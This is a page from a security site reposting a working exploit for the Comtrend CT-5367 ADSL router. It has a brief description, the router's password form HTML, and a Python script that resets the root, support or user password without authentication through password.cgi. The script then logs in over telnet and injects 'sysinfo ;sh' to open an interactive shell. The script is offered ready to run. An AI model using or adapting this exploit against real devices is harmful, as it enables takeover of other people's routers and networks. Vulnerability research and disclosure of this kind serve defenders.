首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
COMTREND ADSL Router CT-5367 - Remote Code Execution
来源:vfocus.net 作者:TnMch 发布时间:2017-12-27  
# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type          : HardWare
# Risk of use   : High
# Type to use   : Remote
 
 
1. Description
   
Any user can edit all users password and execute remote code directly without have access
   
2. Proof of Concept
 
request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi
 
<form>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
      <td width="120">Username:</td>
      <td><select name='userName' size="1">
            <option value="0">
            <option value="1">root <!-- admin -->
            <option value="2">support <!-- support -->
            <option value="3">user <!-- user -->
         </select></td>
   </tr>
   <tr>
      <td>Old Password:</td>
      <td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
   </tr>
   <tr>
      <td>New Password:</td>
      <td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
   </tr>
   <tr>
      <td>Confirm Password:</td>
      <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
   </tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>
 
   
3 .exploit
 
 
#!/usr/bin/env python
import platform
import requests
import base64
 
url = "http://192.168.1.1/"
 
''' first check default gateway '''
 
r = requests.get(url,allow_redirects=True)
resp = r.content
 
'''Check resp'''
 
if 'Authorization' not in resp:
    exit("[-]Invalid host !! ")
 
''' Change password '''
 
again = True
 
while again:
    print "Which User"
    print "(root | support | user )"
    user = raw_input('user : ').split()[0]
 
    if user not in ("root","support","user"):
        exit("[-] No user with this name !! ")
 
    print "[+] Update password ",user
    password = raw_input('new password : ').split()[0]
    print "[+] Update new password ['",password,"']"
 
    if user == "root":
       url +="password.cgi?sysPassword="+password
    if user == "support":
       url +="password.cgi?sptPassword="+password
    if user == "user":
       url +="password.cgi?usrPassword="+password
 
    pass_b64 = password.encode('base64').split()[0]
 
    r2 = requests.get(url,allow_redirects=True)
    resp2 = r2.content
 
    ''' Check update '''
 
    if pass_b64 in resp2:
        print "[+] Password for user : ",user," updated!"
        print "Happy hacking :D, enjoy"
    else:
        print "[-] Something Wrong , please check again! "
    
    y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
    
    if 'n'!= y_n and 'y' != y_n:
        exit('bad input :(')
    if y_n == 'n':
        print "Go Go Go :D ,No Time for you Mr.Robot"
        shell_yn=  raw_input("Do you want shell? (y/n) :D : ").split()[0]
        if shell_yn !='n':
            sys = platform.system()
            if sys =="Windows":
                exit("Sorry only on Linux or Mac Os")
            from pwn import *
            target = "192.168.1.1"
            port = 23
            p = remote(target,port)
            p.recvuntil("Login:")
            p.sendline(user)
            p.recvuntil("Password:")
            p.sendline(password)
            p.sendline("sysinfo ;sh")
            p.interactive()
        again = False
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GetGo Download Manager 5.3.0.2
·Sendroid < 6.5.0 - SQL Injecti
·Oracle MySQL UDF Payload Execu
·Telesquare SKT LTE Router SDT-
·Trend Micro Smart Protection S
·SysGauge Server 3.6.18 - Denia
·Xbox 360 Aurora 0.6b Default C
·DotNetNuke DreamSlider 01.01.0
·Netcore / Netis Routers - UDP
·ALLMediaServer 0.95 - Buffer O
·Fortinet FortiGate 4.x < 5.0.7
·Kingsoft Antivirus/Internet Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved